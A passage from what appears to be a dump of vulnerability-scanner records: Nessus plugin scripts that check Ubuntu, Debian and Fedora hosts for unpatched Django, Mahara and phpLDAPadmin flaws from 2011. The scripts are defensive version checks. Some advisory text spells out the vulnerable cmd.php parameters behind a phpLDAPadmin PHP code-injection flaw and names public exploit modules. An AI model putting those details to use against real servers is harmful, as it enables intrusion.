"cpe:/o:canonical:ubuntu_linux:11.10"], "id": "UBUNTU_USN-1297-1.NASL", "href": "https://www.tenable.com/plugins/nessus/57061", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1297-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57061);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\");\n script_bugtraq_id(49573);\n script_xref(name:\"USN\", value:\"1297-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : python-django vulnerabilities (USN-1297-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Pall McMillan discovered that Django used the root namespace when\nstoring cached session data. A remote attacker could exploit this to\nmodify sessions. (CVE-2011-4136)\n\nPaul McMillan discovered that Django would not timeout on arbitrary\nURLs when the application used URLFields. This could be exploited by a\nremote attacker to cause a denial of service via resource exhaustion.\n(CVE-2011-4137)\n\nPaul McMillan discovered that while Django would check the validity of\na URL via a HEAD request, it would instead use a GET request for the\ntarget of a redirect. This could potentially be used to trigger\narbitrary GET requests via a crafted Location header. (CVE-2011-4138)\n\nIt was discovered that Django would sometimes use a request's HTTP\nHost header to construct a full URL. A remote attacker could exploit\nthis to conduct host header cache poisoning attacks via a crafted\nrequest. (CVE-2011-4139).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1297-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python-django package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python-django\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2011-2019 Canonical, Inc. / NASL script (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|10\\.10|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 10.10 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"python-django\", pkgver:\"1.1.1-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"python-django\", pkgver:\"1.2.3-1ubuntu0.2.10.10.3\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"python-django\", pkgver:\"1.2.5-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"python-django\", pkgver:\"1.3-2ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-django\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:42", "description": "Several vulnerabilities were discovered in Mahara, an electronic portfolio, weblog, and resume builder :\n\n - CVE-2011-2771 Teemu Vesala discovered that missing input sanitising of RSS feeds could lead to cross-site scripting.\n\n - CVE-2011-2772 Richard Mansfield discovered that insufficient upload restrictions allowed denial of service.\n\n - CVE-2011-2773 Richard Mansfield discovered that the management of institutions was prone to cross-site request forgery.\n\n - (no CVE ID available yet)\n\n Andrew Nichols discovered a privilege escalation vulnerability in MNet handling.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-07T00:00:00", "type": "nessus", "title": "Debian DSA-2334-1 : mahara - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2771", "CVE-2011-2772", "CVE-2011-2773"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mahara", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2334.NASL", "href": "https://www.tenable.com/plugins/nessus/56714", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2334. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56714);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2771\", \"CVE-2011-2772\", \"CVE-2011-2773\");\n script_xref(name:\"DSA\", value:\"2334\");\n\n script_name(english:\"Debian DSA-2334-1 : mahara - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in Mahara, an electronic\nportfolio, weblog, and resume builder :\n\n - CVE-2011-2771\n Teemu Vesala discovered that missing input sanitising of\n RSS feeds could lead to cross-site scripting.\n\n - CVE-2011-2772\n Richard Mansfield discovered that insufficient upload\n restrictions allowed denial of service.\n\n - CVE-2011-2773\n Richard Mansfield discovered that the management of\n institutions was prone to cross-site request forgery.\n\n - (no CVE ID available yet)\n\n Andrew Nichols discovered a privilege escalation\n vulnerability in MNet handling.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2771\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2772\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2773\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/mahara\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2334\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mahara packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.4-4+lenny11.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.6-2+squeeze3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mahara\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"mahara\", reference:\"1.0.4-4+lenny11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mahara\", reference:\"1.2.6-2+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mahara-apache2\", reference:\"1.2.6-2+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mahara-mediaplayer\", reference:\"1.2.6-2+squeeze3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:35", "description": "Update to the latest upstream development code to fix CVE-2011-4074 and CVE-2011-4075 (XSS and code injection vulnerabilities in versions <= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-26T00:00:00", "type": "nessus", "title": "Fedora 16 : phpldapadmin-1.2.1.1-2.20111006git.fc16 (2011-14924)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpldapadmin", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2011-14924.NASL", "href": "https://www.tenable.com/plugins/nessus/56934", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-14924.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56934);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_xref(name:\"FEDORA\", value:\"2011-14924\");\n\n script_name(english:\"Fedora 16 : phpldapadmin-1.2.1.1-2.20111006git.fc16 (2011-14924)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to the latest upstream development code to fix CVE-2011-4074\nand CVE-2011-4075 (XSS and code injection vulnerabilities in versions\n<= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=748537\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069708.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?84bb798e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpldapadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpLDAPadmin 1.2.1.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpLDAPadmin query_engine Remote PHP Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpldapadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"phpldapadmin-1.2.1.1-2.20111006git.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpldapadmin\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:27", "description": "Update to the latest upstream development code to fix CVE-2011-4074 and CVE-2011-4075 (XSS and code injection vulnerabilities in versions <= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-26T00:00:00", "type": "nessus", "title": "Fedora 14 : phpldapadmin-1.2.1.1-2.20111006git.fc14 (2011-14986)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpldapadmin", "cpe:/o:fedoraproject:fedora:14"], "id": "FEDORA_2011-14986.NASL", "href": "https://www.tenable.com/plugins/nessus/56935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-14986.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56935);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_xref(name:\"FEDORA\", value:\"2011-14986\");\n\n script_name(english:\"Fedora 14 : phpldapadmin-1.2.1.1-2.20111006git.fc14 (2011-14986)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to the latest upstream development code to fix CVE-2011-4074\nand CVE-2011-4075 (XSS and code injection vulnerabilities in versions\n<= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=748537\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069724.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78d671d2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpldapadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpLDAPadmin 1.2.1.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpLDAPadmin query_engine Remote PHP Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpldapadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"phpldapadmin-1.2.1.1-2.20111006git.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpldapadmin\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:37", "description": "Two vulnerabilities have been discovered in phpLDAPadmin, a web-based interface for administering LDAP servers. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2011-4074 Input appended to the URL in cmd.php (when 'cmd' is set to '_debug') is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.\n\n - CVE-2011-4075 Input passed to the 'orderby' parameter in cmd.php (when 'cmd' is set to'query_engine', 'query' is set to 'none', and 'search' is set to e.g.'1') is not properly sanitised in lib/functions.php before being used in a'create_function()' function call. This can be exploited to inject and execute arbitrary PHP code.", "cvss3": {"score": null, "vector": null}, "published": "2011-10-31T00:00:00", "type": "nessus", "title": "Debian DSA-2333-1 : phpldapadmin - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:phpldapadmin", "cpe:/o:debian:debian_linux:5.0", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2333.NASL", "href": "https://www.tenable.com/plugins/nessus/56672", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2333. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56672);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_bugtraq_id(50331);\n script_xref(name:\"DSA\", value:\"2333\");\n\n script_name(english:\"Debian DSA-2333-1 : phpldapadmin - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two vulnerabilities have been discovered in phpLDAPadmin, a web-based\ninterface for administering LDAP servers. The Common Vulnerabilities\nand Exposures project identifies the following problems :\n\n - CVE-2011-4074\n Input appended to the URL in cmd.php (when 'cmd' is set\n to '_debug') is not properly sanitised before being\n returned to the user. This can be exploited to execute\n arbitrary HTML and script code in a user's browser\n session in context of an affected site.\n\n - CVE-2011-4075\n Input passed to the 'orderby' parameter in cmd.php (when\n 'cmd' is set to'query_engine', 'query' is set to 'none',\n and 'search' is set to e.g.'1') is not properly\n sanitised in lib/functions.php before being used in\n a'create_function()' function call. This can be\n exploited to inject and execute arbitrary PHP code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=646754\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/phpldapadmin\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2333\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the phpldapadmin packages.\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version 1.1.0.5-6+lenny2.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 1.2.0.5-2+squeeze1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpLDAPadmin 1.2.1.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpLDAPadmin query_engine Remote PHP Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:phpldapadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"phpldapadmin\", reference:\"1.1.0.5-6+lenny2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"phpldapadmin\", reference:\"1.2.0.5-2+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:59:35", "description": "Update to the latest upstream development code to fix CVE-2011-4074 and CVE-2011-4075 (XSS and code injection vulnerabilities in versions <= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-26T00:00:00", "type": "nessus", "title": "Fedora 15 : phpldapadmin-1.2.1.1-2.20111006git.fc15 (2011-14993)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2021-01-11T00:00:00", "cpe": 